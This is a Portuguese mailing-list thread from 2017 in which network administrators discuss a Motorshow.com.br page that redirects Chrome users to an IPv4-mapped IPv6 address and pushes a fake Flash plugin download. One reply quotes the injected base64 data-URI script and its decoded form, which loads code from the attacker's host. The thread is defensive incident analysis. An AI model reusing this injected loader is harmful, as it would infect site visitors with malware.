[caiu] RES: Terra / Motorshow.com.br Infectado
Ednilson Aureliano
ednilson em eddy.com.br
Qua Jun 14 12:55:31 BRT 2017
A pagina sofreu algum ataque e foi alterado o conteudo.
Adicionado o codigo: data:application_javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoIiUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCU2OCU3NCU3NCU3MCUzQSUyRiUyRiU1QiUzQSUzQSU2NiU2NiU2NiU2NiUzQSUzMyUzNCUzMCU2NiUzQSUzNiUzMSUzMiUzMiU1RCUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSIpKTs=
Que decodificado, é o redirecionamento:
document.write(unescape("<script src=http_::ffff:340f:6122]><_script>"));
O endereço em questão: ::ffff:340f:6122, é o ipv4 convertido.
---- On Qua, 14 jun 2017 11:19:18 -0300 Fábio Hernandes <fabio em hernandes.eti.br> wrote ----
Abre normal aqui pra mim, usando link vivo, navegador firefox e dns
consultando root servers.
--
Fábio R. Hernandes
Fone: (17) 99643 6715
Skype: hernandes.fabio
Em 14 de junho de 2017 10:18, Marcos Carraro | Dalmobile <
marcos.ti em dalmobile.com.br> escreveu:
> Então o site deve estar violado, melhor que não foi o DNS.
>
> Obrigado pelos retornos!
>
>
>
> Marcos Carraro
>
>
>
> -----Mensagem original-----
> De: caiu [mailto:caiu-bounces em eng.registro.br] Em nome de Marcelo Fiorini
> Enviada em: quarta-feira, 14 de junho de 2017 10:10
> Para: caiu em eng.registro.br
> Assunto: Re: [caiu] Terra / Motorshow.com.br Infectado
>
> Estou no DNS da TIM
>
>
> Em 14/06/2017 09:19, Leandro Carlos Rodrigues escreveu:
> > Em 14/06/2017 09:16, Marcelo Fiorini escreveu:
> >> Aqui ocorreu o mesmo que com o André
> >
> > Qual servidor DNS vocês dois estão usando?
> >
> >>
> >>
> >>
> >> Em 14/06/2017 09:06, Andre Almeida escreveu:
> >>> Aqui aconteceu o mesmo problema, primeiro informou algo sobre o flash.
> >>> E logo após alterou a URL para http://[::ffff:340f:6122]/?A
> >>>
> >>> Att
> >>> Andre Almeida
> >>>
> >>> Em 14 de junho de 2017 08:59, Lanio Nascimento <
> >>> lanio.nascimento em coinvalores.com.br> escreveu:
> >>>
> >>>> Marcos,
> >>>> Parece que seu navegador é que esta infectado.
> >>>>
> >>>> Aqui abriu normalmente.
> >>>> Tente navegador - Depois DNS - Para depois ir para camada 3
> >>>>
> >>>>
> >>>> *Lanio do Nascimento Amaral *
> >>>> Departamento de TI
> >>>> Coinvalores
> >>>> Fone:11 3035-4147
> >>>> Fone:11 3500-4147
> >>>>
> >>>> lanio.nascimento em coinvalores.com.br
> >>>> www.coinvalores.com.br
> >>>> Av. Brig. Faria Lima, 1461 - 10º Andar Torre Sul - CEP: 01452-921 -
> >>>> São Paulo - SP
> >>>>
> >>>> P *Antes de imprimir, pense em sua responsabilidade e compromisso
> >>>> com o meio ambiente*.
> >>>>
> >>>> *ALERTA -* As informações contidas nesta mensagem e nos arquivos
> >>>> anexados são para uso restrito, sendo seu sigilo protegido por lei,
> >>>> não havendo ainda garantia legal quanto à integridade de seu
> >>>> conteúdo. Caso não seja o destinatário, por favor desconsidere essa
> >>>> mensagem. O uso indevido dessas informações será tratado conforme
> >>>> as normas da empresa e a legislação em vigor.
> >>>>
> >>>> *NOTICE -* The information in this e-mail and in the attached files
> >>>> are confidential and may be legally privileged. There is no legal
> >>>> guarantee as regards the reliability of said information. If you
> >>>> are not the intended recipient please disregard the content
> >>>> thereof. The unduly use of this information is subject to the rules
> >>>> of the company and the legislation in force.
> >>>>
> >>>> Em 14 de junho de 2017 08:54, Marcos Carraro | Dalmobile <
> >>>> marcos.ti em dalmobile.com.br> escreveu:
> >>>>
> >>>>> Bom Dia,
> >>>>>
> >>>>> Ao acessar a URL
> >>>>> http://motorshow.com.br/3-cilindros-a-nova-era-dos-carros-1-0/
> >>>>> pelo google chrome, o mesmo redireciona para a seguinte url
> >>>>> http:// [::ffff:340f:6122]/ forçando o download de um plugin Adobe
> >>>>> Flash Player, porém o ocorrido só acontece com o Chrome.
> >>>>>
> >>>>> Fazendo alguns testes o endereço ::ffff:340f:6122 aponta para
> >>>>> 52.15.97.34
> >>>>> da
> >>>>> amazona.
> >>>>>
> >>>>> Alguém mais identificou esta anomalia ?
> >>>>>
> >>>>> Obs:. Utilizando IPV4, IPV6 não esta ativo no provedor e nem na
> >>>>> estação, tudo faz pensar que o provedor ou amazona está fazendo
> >>>>> uma conversão de
> >>>>> IPV6
> >>>>> para IPV4
> >>>>>
> >>>>>
> >>>>> Marcos Carraro
> >>>>>
> >>>>>
> >>>>> _______________________________________________
> >>>>> caiu mailing list
> >>>>> caiu em eng.registro.br
> >>>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>>
> >>>>>
> >>>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>>
> >>>>> https://eng.registro.br/mailman/options/caiu
> >>>>>
> >>>> _______________________________________________
> >>>> caiu mailing list
> >>>> caiu em eng.registro.br
> >>>> https://eng.registro.br/mailman/listinfo/caiu
> >>>>
> >>>>
> >>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>>
> >>>> https://eng.registro.br/mailman/options/caiu
> >>>>
> >>> _______________________________________________
> >>> caiu mailing list
> >>> caiu em eng.registro.br
> >>> https://eng.registro.br/mailman/listinfo/caiu
> >>>
> >>>
> >>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >>>
> >>> https://eng.registro.br/mailman/options/caiu
> >>
> >
> > _______________________________________________
> > caiu mailing list
> > caiu em eng.registro.br
> > https://eng.registro.br/mailman/listinfo/caiu
> >
> >
> > --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
> >
> > https://eng.registro.br/mailman/options/caiu
>
> --
> _______________________________________________
> caiu mailing list
> caiu em eng.registro.br
> https://eng.registro.br/mailman/listinfo/caiu
>
>
> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
>
> https://eng.registro.br/mailman/options/caiu
>
> _______________________________________________
> caiu mailing list
> caiu em eng.registro.br
> https://eng.registro.br/mailman/listinfo/caiu
>
>
> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
>
> https://eng.registro.br/mailman/options/caiu
>
_______________________________________________
caiu mailing list
caiu em eng.registro.br
https://eng.registro.br/mailman/listinfo/caiu
--> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
https://eng.registro.br/mailman/options/caiu
Mais detalhes sobre a lista de discussão caiu